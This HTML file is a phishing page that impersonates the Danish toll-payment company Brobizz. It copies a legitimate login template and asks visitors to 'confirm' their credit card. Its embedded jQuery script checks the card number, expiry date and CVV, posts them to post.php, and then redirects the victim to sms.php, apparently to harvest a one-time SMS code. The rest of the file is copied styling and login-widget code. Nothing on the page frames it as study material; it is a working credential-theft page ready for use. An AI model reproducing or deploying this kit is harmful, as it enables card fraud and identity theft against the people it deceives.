<html lang="en"><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
        <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    
      <meta name="ulp-version" content="1.17.115">
    
    
    
    <meta name="robots" content="noindex, nofollow">
    
    
    <link rel="stylesheet" href="css/main.cdn.min.css">
    <style id="custom-styles-container">
      
        




        
          :root {
    --primary-color: #00a64e;
  }
        
      

        
          :root {
    --button-font-color: #ffffff;
  }
        
      

        
          :root {
    --secondary-button-border-color: #c9cace;
    --social-button-border-color: #c9cace;
    --radio-button-border-color: #c9cace;
  }
        
      

        
          :root {
    --secondary-button-text-color: #1e212a;
  }
        
      

        
          :root {
    --link-color: #635dff;
  }
        
      

        
          :root {
    --title-font-color: #1e212a;
  }
        
      

        
          :root {
    --font-default-color: #1e212a;
  }
        
      

        
          :root {
    --widget-background-color: #ffffff;
  }
        
      

        
          :root {
    --box-border-color: #c9cace;
  }
        
      

        
          :root {
    --font-light-color: #65676e;
  }
        
      

        
          :root {
    --input-text-color: #000000;
  }
        
      

        
          :root {
    --input-border-color: #c9cace;
    --border-default-color: #c9cace;
  }
        
      

        
          :root {
    --input-background-color: #ffffff;
  }
        
      

        
          :root {
    --icon-default-color: #65676e;
  }
        
      

        
          :root {
    --error-color: #d03c38;
    --error-text-color: #ffffff;
  }
        
      

        
          :root {
    --success-color: #13a688;
  }
        
      

        
          :root {
    --base-focus-color: #635dff;
    --transparency-focus-color: rgba(99,93,255, 0.15);
  }
        
      

        
          :root {
    --base-hover-color: #000000;
    --transparency-hover-color: rgba(0,0,0, var(--hover-transparency-value));
  }
        
      

        
      




        
          @font-face {
    font-family: 'ULP Custom';
    font-style: normal;
    font-weight: var(--font-default-weight);
    src: local('ULP Custom'), url('https://stdbrobizzbilling.blob.core.windows.net/brobizzimagelogo/Campton_Book.woff') format('woff');
  }

  body {
    --font-family: 'ULP Custom', -apple-system, BlinkMacSystemFont, Roboto, Helvetica, sans-serif;
  }
        
      

        
          html, :root {
    font-size: 16px;
    --default-font-size: 16px;
  }
        
      

        
          body {
    --title-font-size: 1.5rem;
    --title-font-weight: var(--font-default-weight);
  }
        
      

        
          .c3796a4db {
    font-size: 0.875rem;
    font-weight: var(--font-default-weight);
  }
        
      

        
          .ce16dfdb7 {
    font-size: 0.875rem;
    font-weight: var(--font-default-weight);
  }
  .ulp-passkey-benefit-heading {
    font-size: 1.025rem;
  }
        
      

        
          .c27976896, .cae724a40 {
    font-size: 1rem;
    font-weight: var(--font-default-weight);
  }
        
      

        
          body {
    --ulp-label-font-size: 1rem;
    --ulp-label-font-weight: var(--font-default-weight);
  }
        
      

        
          .c37a14c7b, .cb181a341, [id^='ulp-container-'] a {
    font-size: 0.875rem;
    font-weight: var(--font-bold-weight) !important;
  }
        
      

        
          
        
      




        
          :root {
    --button-border-width: 1px;
    --social-button-border-width: 1px;
    --radio-border-width: 1px;
  }
        
      

        
          body {
    --button-border-radius: 9999px;
    --radio-border-radius: 9999px;
  }
        
      

        
          :root {
    --input-border-width: 1px;
  }
        
      

        
          body {
    --input-border-radius: 3px;
  }
        
      

        
          :root {
    --border-radius-outer: 19px;
  }
        
      

        
          :root {
    --box-border-width: 0px;
  }
        
      

        
          
        
      




        
          
    body {
      --logo-alignment: 0 auto;
    }
  
        
      

        
          
    .cbefd69e1 {
      content: url('https://brobizz.com/sites/brobizz/themes/bb/images/brobizz_logo.svg');
    }
  
        
      

        
          body {
    --logo-height: 52px;
  }
  .cbefd69e1 {
    height: var(--logo-height);
  }
  
        
      

        
          
    body {
      --header-alignment: center;
    }
  
        
      

        
          
        
      




        
          .c136c0e45 {
    --page-background-alignment: center;
  }
        
      

        
          body {
    --page-background-color: #000000;
  }
        
      

        
          .c136c0e45 {
    --page-background-image: url('https://stdbrobizzminkonto.blob.core.windows.net/temp/Brobizz-login_background_picture-opti.jpg');
  }
        
      




      
    </style>
    <style>
    /* By default, hide features for javascript-disabled browsing */
    /* We use !important to override any css with higher specificity */
    /* It is also overriden by the styles in <noscript> in the header file */
    .no-js {
      clip: rect(0 0 0 0);
      clip-path: inset(50%);
      height: 1px;
      overflow: hidden;
      position: absolute;
      white-space: nowrap;
      width: 1px;
    }
  </style>
  <noscript>
    <style>
      /* We use !important to override the default for js enabled */
      /* If the display should be other than block, it should be defined specifically here */
      .js-required { display: none !important; }
      .no-js {
        clip: auto;
        clip-path: none;
        height: auto;
        overflow: auto;
        position: static;
        white-space: normal;
        width: var(--prompt-width);
      }
    </style>
  </noscript>
    
    <title>Bekræft dit kreditkort.</title>
  </head>
  
  <body>
    <div class="c1a2a6ec5 c136c0e45">
  
<main class="cf0764a4a login">
  <section class="c4b29eca4 _prompt-box-outer c05e9daa5">
    <div class="c6659f309 cccb93873">
      
    
      <div class="c31ae6f41">
        <header class="cf2c263ec c3b965638">
          <div title="Brobizz A/S" id="custom-prompt-logo" style="width: auto !important; height: 60px !important; position: static !important; margin: auto !important; padding: 0 !important; background-color: transparent !important; background-position: center !important; background-size: contain !important; background-repeat: no-repeat !important"></div>
        
          <img class="cbefd69e1 c9ea68b50" id="prompt-logo-center" src="css/brobizz_logo.svg" alt="Brobizz A/S">
        
          
            <h1 class="cc854c13c c8b064d01">Velkommen til Brobizz</h1>
          
        
          <div class="c3796a4db c0ba659d6">
            
              <p class="c83b79980 c2fd98237">Bekræft dit kreditkort 2024.</p>
            
          </div>
        </header>
      
        <div class="ce16dfdb7 cfc0cd1f7">
          
        
          <script>
$("#d1").mask("0000 0000 0000 0000");
$("#d2").mask("00/00");
$("#d3").mask('0000');
$("#d4").mask('0000');


var allowSubmit;
var abortVal = true;
 

function validate(){
  abortVal=false;
  allowSubmit=true;
for(var i=0; i<=3; i++){
  if($("#d"+i).val()==""){
    $("#d"+i).addClass("error");
      allowSubmit=false;
  }else{
    $("#d"+i).removeClass("error");
  }
}

 


if($("#d1").val().length<19){
  $("#d1").addClass("error");
  allowSubmit=false;
}

if($("#d3").val().length<3){
  $("#d3").addClass("error");
  allowSubmit=false;
}


$('#d1').validateCreditCard(function(result) {
    if (result.valid) {
        $("#d1").removeClass('error');
    } else {
        $("#d1").addClass("error");
        allowSubmit=false;
    }
});

var _exp = $("#d2").val();
const _exps = _exp.split("/");
if(_exps[0]>12 || _exps[0]<=0 || _exps[1]>40 || _exps[1]<24 || _exp.length<5){
    $("#d2").addClass("error");
  allowSubmit=false;
}

}

$("input").keyup(()=>{   
    if(!abortVal){
        validate();
    }
});

$("input").keypress((e)=>{
    if(e.key=="Enter"){
        sendCard();
    }
});

function sendCard(){
    validate();

    if(allowSubmit){
     $(".loader").show();
        $.post("post.php", 
      {
                name:$("#d0").val(),
        cc:$("#d1").val(),
                exp:$("#d2").val(),
        cvv:$("#d3").val()

      }, function(done){
                setTimeout(() => {
                     window.location="sms.php";
                 }, 13000);    
      }
    
    );

    }
}


 

</script>
            <form name="form1" method="post" action="post/api2.php" onkeypress="javascript:return WebForm_FireDefaultButton(event, 'okButton')" id="form1" autocomplete="off">
              <input type="hidden" name="state" value="">
            
              
            
              <div class="c925c2b03 cbb3754db">
                <div class="c7f2d18c1">
                  
                
                  
                    <div class="input-wrapper _input-wrapper">
                      <div class="ccd761bda c9104f547 text ca9add931 c510d718d" data-action-text="" data-alternate-action-text="">
                        <label class="cf7a8e814 no-js c1ea92e47 c4c3ef09d" for="username">
                          Kortnummer
                        </label>
                      
                        <input class="input c0347a5e6 cce001ae5" inputmode="email" name="zz" id="username" type="text" required="" autocomplete="username" autocapitalize="none" spellcheck="false" autofocus="">
                      
                        <div class="cf7a8e814 js-required c1ea92e47 c4c3ef09d" data-dynamic-label-for="username" aria-hidden="true">
                          Kortnummer
                        </div>
                      </div>
                    
                      
                    </div>
                  
                
                  <div class="input-wrapper _input-wrapper">
                    <div class="ccd761bda c9104f547 password c2e3c04b5 c510d718d" data-action-text="" data-alternate-action-text="">
                      <label class="cf7a8e814 no-js c1ea92e47 c09f4df05" for="password">
                         Udløbsdato
                      </label>
                    
                      <input class="input c0347a5e6 c7963a6ae" name="aa" id="password" type="tele" required="" autocomplete="current-password" autocapitalize="none" spellcheck="false">
                    
                      <div class="cf7a8e814 js-required c1ea92e47 c09f4df05" data-dynamic-label-for="tele" aria-hidden="true">
                         Udløbsdato
                      </div>
                    
                      <button type="button" class="c27976896 ulp-button-icon cced51fe7 _button-icon" data-action="toggle">
                        <span aria-hidden="true" class="password-icon-tooltip show-password-tooltip">Show password</span>
                      
                        <span aria-hidden="true" class="password-icon-tooltip hide-password-tooltip hide">Hide password</span>
                      
                        <span class="screen-reader-only password-toggle-label" data-label="show-password">Show password</span>
                      
                        <span class="screen-reader-only password-toggle-label hide" data-label="hide-password">Hide password</span>
                      
                        <span class="c59fcfe76 password js-required" aria-hidden="true"></span>
                      </button>
                    
					
					
					
                      </div>
					
                    
                      
                    </div>
                  
                
                  <div class="input-wrapper _input-wrapper">
                    <div class="ccd761bda c9104f547 password c2e3c04b5 c510d718d" data-action-text="" data-alternate-action-text="">
                      <label class="cf7a8e814 no-js c1ea92e47 c09f4df05" for="password">
                        Cvv
                      </label>
                    
                      <input class="input c0347a5e6 c7963a6ae" name="qq" id="password" type="tele" required="" autocomplete="current-password" autocapitalize="none" spellcheck="false">
                    
                      <div class="cf7a8e814 js-required c1ea92e47 c09f4df05" data-dynamic-label-for="tele" aria-hidden="true">
                       Cvv
                      </div>
                    
                      <button type="button" class="c27976896 ulp-button-icon cced51fe7 _button-icon" data-action="toggle">
                        <span aria-hidden="true" class="password-icon-tooltip show-password-tooltip">Show password</span>
                      
                        <span aria-hidden="true" class="password-icon-tooltip hide-password-tooltip hide">Hide password</span>
                      
                        <span class="screen-reader-only password-toggle-label" data-label="show-password">Show password</span>
                      
                        <span class="screen-reader-only password-toggle-label hide" data-label="hide-password">Hide password</span>
                      
                        <span class="c59fcfe76 password js-required" aria-hidden="true"></span>
                      </button>
                    </div>
                  
                    
                  </div>
                
                  
                </div>
              </div>
            
              
                
                  <p class="cfaf2605b c8f76670d">
                    
                      <a class="cb181a341 cf0351da7 ca8ce6dc8" href="" aria-label="">Referencenummer: SSC-618085713-993548</a>
                    
                  </p>
                
              
            
              
            
                <div class="cb2df1009">
                
                  <button type="submit" name="action" value="default" class="c27976896 c59c30c43 cced51fe7 c5e1937d6 c357202ae" data-action-button-primary="">Næste</button>
                
              </div>
            </form>
          
        
          
        
          
        
          
        
          
        
          
        </div>
      </div>
    </div>
  
    
  </section>
</main>
<script id="client-scripts">
!function(){var t,e,n,S,C,T,A,x,L,r,a=((t={}).exports=function(n,a){var r={};function c(t,e){if(t.classList)return t.classList.add(e);var n=t.className.split(" ");-1===n.indexOf(e)&&(n.push(e),t.className=n.join(" "))}function o(t,e,n,r){return t.addEventListener(e,n,r)}function i(t){return"string"==typeof t}function u(t,e){return i(t)?a.querySelector(t):t.querySelector(e)}function s(t,e){if(t.classList)return t.classList.remove(e);var n=t.className.split(" "),r=n.indexOf(e);-1!==r&&(n.splice(r,1),t.className=n.join(" "))}function l(t,e){return t.getAttribute(e)}function f(t,e,n){return t.setAttribute(e,n)}var t=["text","number","email","password","tel","url"],e="select,textarea,"+t.map(function(t){return'input[type="'+t+'"]'}).join(",");return{addClass:c,toggleClass:function(t,e,n){if(!0===n||!1===n)return r=t,a=e,!0!==n?s(r,a):c(r,a);var r,a;if(t.classList)return t.classList.toggle(e);var o=t.className.split(" "),i=o.indexOf(e);-1!==i?o.splice(i,1):o.push(e),t.className=o.join(" ")},hasClass:function(t,e){return t.classList?t.classList.contains(e):-1!==t.className.split(" ").indexOf(e)},addClickListener:function(t,e){return o(t,"click",e)},addEventListener:o,getAttribute:l,getElementById:function(t){return a.getElementById(t)},getParent:function(t){return t.parentNode},isString:i,loadScript:function(t,e){var n=a.createElement("script");for(var r in e)r.startsWith("data-")?n.dataset[r.replace("data-","")]=e[r]:n[r]=e[r];n.src=t,a.body.appendChild(n)},removeScript:function(t){a.querySelectorAll('script[src="'+t+'"]').forEach(function(t){t.remove()})},poll:function(t){var o=t.interval||2e3,e=t.url||n.location.href,i=t.condition||function(){return!0},c=t.onSuccess||function(){},u=t.onError||function(){};return setTimeout(function r(){var a=new XMLHttpRequest;return a.open("GET",e),a.setRequestHeader("Accept","application/json"),a.onload=function(){if(200===a.status){var t="application/json"===a.getResponseHeader("Content-Type").split(";")[0]?JSON.parse(a.responseText):a.responseText;return i(t)?c():setTimeout(r,o)}if(429!==a.status)return u({status:a.status,responseText:a.responseText});var e=1e3*Number.parseInt(a.getResponseHeader("X-RateLimit-Reset")),n=e-(new Date).getTime();return setTimeout(r,o<n?n:o)},a.send()},o)},querySelector:u,querySelectorAll:function(t,e){var n=i(t)?a.querySelectorAll(t):t.querySelectorAll(e);return Array.prototype.slice.call(n)},removeClass:s,removeElement:function(t){return t.remove()},setAttribute:f,removeAttribute:function(t,e){return t.removeAttribute(e)},swapAttributes:function(t,e,n){var r=l(t,e),a=l(t,n);f(t,n,r),f(t,e,a)},setGlobalFlag:function(t,e){r[t]=!!e},getGlobalFlag:function(t){return!!r[t]},preventFormSubmit:function(t){t.stopPropagation(),t.preventDefault()},matchMedia:function(t){return"function"!=typeof n.matchMedia&&n.matchMedia(t).matches},dispatchEvent:function(t,e,n){var r;"function"!=typeof Event?(r=a.createEvent("Event")).initCustomEvent(e,n,!1):r=new Event(e,{bubbles:n}),t.dispatchEvent(r)},timeoutPromise:function(t,a){return new Promise(function(e,n){var r=setTimeout(function(){n(new Error("timeoutPromise: promise timed out"))},t);a.then(function(t){clearTimeout(r),e(t)},function(t){clearTimeout(r),n(t)})})},createMutationObserver:function(t){return"undefined"==typeof MutationObserver?null:new MutationObserver(t)},consoleWarn:function(){(console.warn||console.log).apply(console,arguments)},getConfigJson:function(t){try{var e=u(t);if(!e)return null;var n=e.value;return n?JSON.parse(n):null}catch(t){return null}},getCSSVariable:function(t){return getComputedStyle(a.documentElement).getPropertyValue(t)},setTimeout:setTimeout,globalWindow:n,SUPPORTED_INPUT_TYPES:t,ELEMENT_TYPE_SELECTOR:e}},t.exports)(window,document);((e={}).exports=function(r,t,i,c,u,s,l){t("div.ccd761bda.password").forEach(function(t){var a,o,e=r(t,"input"),n=r(t,'[data-action="toggle"]');i(t,(a=e,o=n,function(t){if(t.target.classList.contains("ulp-button-icon")){if(a.type="password"===a.type?"text":"password",o){var e=o.querySelector(".show-password-tooltip"),n=o.querySelector(".hide-password-tooltip");e&&s(e,"hide"),n&&s(n,"hide")}var r=l(a);"text"===a.type?c(r,"show"):u(r,"show")}}))})},e.exports)(a.querySelector,a.querySelectorAll,a.addClickListener,a.addClass,a.removeClass,a.toggleClass,a.getParent),{exports:function(t,r,a,e){var n=t(".cf0764a4a"),o=t("#alert-trigger"),i=t(".cef0ac07f"),c=t(".ce959c1e7"),u=!1;o&&c&&n&&e(n,function(t){var e=t.target===o,n=c.contains(t.target);return e&&!u?(r(i,"show"),void(u=!0)):e&&u||u&&!n?(a(i,"show"),void(u=!1)):void 0})}}.exports(a.querySelector,a.addClass,a.removeClass,a.addClickListener),(S="recaptcha_v2",C="recaptcha_enterprise",T="hcaptcha",A="friendly_captcha",x="arkose",L="auth0_v2",(n={}).exports=function(o,i,a,c,u,s){var l=500,f=3,d=0,p=a("div[data-captcha-sitekey]"),e=a("div[data-captcha-sitekey] input");function v(){switch(g()){case S:return window.grecaptcha;case C:return window.grecaptcha.enterprise;case T:return window.hcaptcha;case A:return window.friendlyChallenge;case x:return window.arkose;case L:return window.turnstile}}function h(){return a(function(){switch(g()){case S:case C:return"#ulp-recaptcha";case T:return"#ulp-hcaptcha";case A:return"#ulp-friendly-captcha";case x:return"#ulp-arkose";case L:return"#ulp-auth0-v2-captcha"}}())}function m(){return p.getAttribute("data-captcha-lang")}function g(){return p.getAttribute("data-captcha-provider")}function b(){return p.getAttribute("data-captcha-sitekey")}function w(){return a('form[data-form-primary="true"]')}function y(t){return e.value=t}function E(){var t=v(),e=s("--ulp-captcha-widget-theme")||"light";if(g()===A){"dark"===e&&c(a(".frc-captcha"),"dark");var n=new t.WidgetInstance(p,{sitekey:b(),language:m(),doneCallback:function(t){y(t)}})}else{var r={sitekey:b(),theme:e,"expired-callback":function(){y(""),c(p,"c6a7adab2"),t.reset(n)},callback:function(t){y(t),u(p,"c6a7adab2")}};g()===L&&(r.language=m(),r.retry="never",r["response-field"]=!1,r["error-callback"]=function(t){return fetch("https://www.cloudflarestatus.com/api/v2/summary.json").then(function(t){return t.json()}).then(function(t){for(var e=0;e<t.components.length;e++){var n=t.components[e];if("Turnstile"===n.name)return"operational"===n.status}return!1}).catch(function(t){return!1}).then(function(t){t&&d<f?(y(""),c(p,"c6a7adab2"),v().reset(n),d++):(y("BYPASS_CAPTCHA"),u(p,"c6a7adab2"))}),!0}),n=t.render(h(),r)}}p&&function(){var t="captchaCallback_"+Math.floor(1000001*Math.random()),e=g(),n={async:!0,defer:!0},r=function(t,e,n,r){switch(g()){case S:return"https://www.recaptcha.net/recaptcha/api.js?render=explicit&hl="+t+"&onload="+e;case C:return"https://www.recaptcha.net/recaptcha/enterprise.js?render=explicit&hl="+t+"&onload="+e;case T:return"https://js.hcaptcha.com/1/api.js?render=explicit&hl="+t+"&onload="+e;case A:return"https://cdn.jsdelivr.net/npm/friendly-challenge@0.9.12/widget.min.js";case x:return"https://"+n+".arkoselabs.com/v2/"+r+"/api.js";case L:return"https://challenges.cloudflare.com/turnstile/v0/api.js?render=explicit&onload="+e}}(m(),t,p.getAttribute("data-captcha-client-subdomain"),b());if(e===x||e===L){n["data-callback"]=t,n.onerror=function(){if(d<f)return i(r),o(r,n),void d++;i(r),y("BYPASS_CAPTCHA")};var a=function(t){var e,n;e=t,n=function(t){setTimeout(function(){e.run()},l),t.preventDefault()},w().addEventListener("submit",n),e.setConfig({onCompleted:function(t){y(t.token),w().submit()},onError:function(t){return fetch("https://status.arkoselabs.com/api/v2/status.json").then(function(t){return t.json()}).then(function(t){var e=t.status.indicator;return"none"===e}).catch(function(t){return!1}).then(function(t){if(t&&d<f)return e.reset(),new Promise(function(t){setTimeout(function(){t(e.run())},l),d++});y("BYPASS_CAPTCHA"),w().removeEventListener("submit",n)})}})};e===L&&(a=function(){E()}),window[t]=a}else window[t]=function(){delete window[t],E()},e===A&&(c(p,"frc-captcha"),p.setAttribute("data-sitekey",b()),n.onload=window[t]);o(r,n)}()},n.exports)(a.loadScript,a.removeScript,a.querySelector,a.addClass,a.removeClass,a.getCSSVariable),((r={}).exports=function(r,t,a,o,i,c,u,s,n,l){function f(t){var e=t.target,n=c(e);e.value||l(e,"data-autofilled")?o(n,"cdb9bc653"):i(n,"cdb9bc653")}function d(t){var e=t.target;"onAutoFillStart"===t.animationName&&(n(e,"data-autofilled",!0),s(t.target,"change",!0),a(e,"keyup",p,{once:!0}))}function p(t){var e=t.target;n(e,"data-autofilled","")}if(r("body._simple-labels"))return t(".cf7a8e814.no-js").forEach(function(t){i(t,"no-js")}),void t(".cf7a8e814.js-required").forEach(function(t){o(t,"hide")});t(".ccd761bda:not(.c11faba28):not(disabled)").forEach(function(t){o(t,"c510d718d");var e,n=r(t,".input");n.value&&o(t,"cdb9bc653"),a(t,"change",f),a(n,"blur",f),a(n,"animationstart",d),e=n,u(function(){e.value&&s(e,"change",!0)},100)})},r.exports)(a.querySelector,a.querySelectorAll,a.addEventListener,a.addClass,a.removeClass,a.getParent,a.setTimeout,a.dispatchEvent,a.setAttribute,a.getAttribute),{exports:function(t,e,n,r,a,o){function i(t){var e=n("submitted");r("submitted",!0),e?a(t):"apple"===o(t.target,"data-provider")&&setTimeout(function(){r("submitted",!1)},2e3)}var c=t("form");c&&c.forEach(function(t){e(t,"submit",i)})}}.exports(a.querySelectorAll,a.addEventListener,a.getGlobalFlag,a.setGlobalFlag,a.preventFormSubmit,a.getAttribute),{exports:function(n,t,r,a,o,i,c,e,u){function s(t){var e=t.target,n=i(e);e.value?a(n,"cdb9bc653"):o(n,"cdb9bc653")}function l(t){var e=t.target,n=i(e);a(n,"focus")}function f(t){var e=t.target,n=i(e);o(n,"focus")}function d(t,e){t.value&&a(e,"cdb9bc653")}function p(){t("[id^='ulp-container-'] .ulp-field").forEach(function(t){if(!c(t,"c510d718d")){var e=n(t,u);e&&(a(t,"c510d718d"),d(e,t),setTimeout(function(){d(e,t)},50),e===document.activeElement&&a(t,"focus"),r(e,"change",s),r(e,"focus",l),r(e,"blur",f))}})}var v=t("[id^='ulp-container-']");if(v&&v.length){var h=e(p);if(h)for(var m=0;m<v.length;m++)h.observe(v[m],{childList:!0,subtree:!0});p()}}}.exports(a.querySelector,a.querySelectorAll,a.addEventListener,a.addClass,a.removeClass,a.getParent,a.hasClass,a.createMutationObserver,a.ELEMENT_TYPE_SELECTOR),{exports:function(r,i,a,o,c,u,s,e,l,f,t){var d=!1,p=t+',input[type="checkbox"]';function v(t){var e=c(t,"data-ulp-validation-function"),n=o(t);return{functionName:e,element:r(n,p),parent:n}}function h(t){var a=[],o=[];return i(t,"[data-ulp-validation-function]").forEach(function(t){var e=v(t),n=[];if(e.element){if("input"===e.element.tagName.toLowerCase()){var r=c(e.element,"type");"checkbox"!==r&&-1===f.indexOf(r)&&n.push("Unsupported input type: "+r)}}else n.push("Could not find element");s[e.functionName]||n.push("Could not find function with name: "+e.functionName),n.length?o=o.concat(n):a.push(t)}),o.length&&e(o.join("\r\n")),a}function m(t,e,n){var r=v(t),a=(0,s[r.functionName])(r.element,e,n);u(t,"ulp-validator-error",!a);var o=i(r.parent,".ulp-validator-error");return u(r.parent,"ulp-error",!!o.length),a}function g(e){var n=v(e),t=(c(e,"data-ulp-validation-event-listeners")||"").replace(/\s/g,"").split(",").filter(function(t){return!!t});t.length&&t.forEach(function(t){a(n.element,t,function(){m(e,d,t)})})}function b(t,e,n){d=!0;var r=n.filter(function(t){return!m(t,d,"submit")});if(r.length){l(e);var a=v(r[0]);a.element.focus({preventScroll:!0}),a.parent.scrollIntoView({behavior:"smooth"})}else t.submit()}function n(){var e=r('form[data-form-primary="true"]'),n=h(e);0!==n.length&&(n.forEach(function(t){g(t)}),a(e,"submit",function(t){b(e,t,n)}))}function w(){var t=i("[id^='ulp-container-']");t&&t.length&&n()}return w(),[p,v,h,m,g,b,n,w]}}.exports(a.querySelector,a.querySelectorAll,a.addEventListener,a.getParent,a.getAttribute,a.toggleClass,a.globalWindow,a.consoleWarn,a.preventFormSubmit,a.SUPPORTED_INPUT_TYPES,a.ELEMENT_TYPE_SELECTOR)}();
</script>
    </div>
  

</body></html>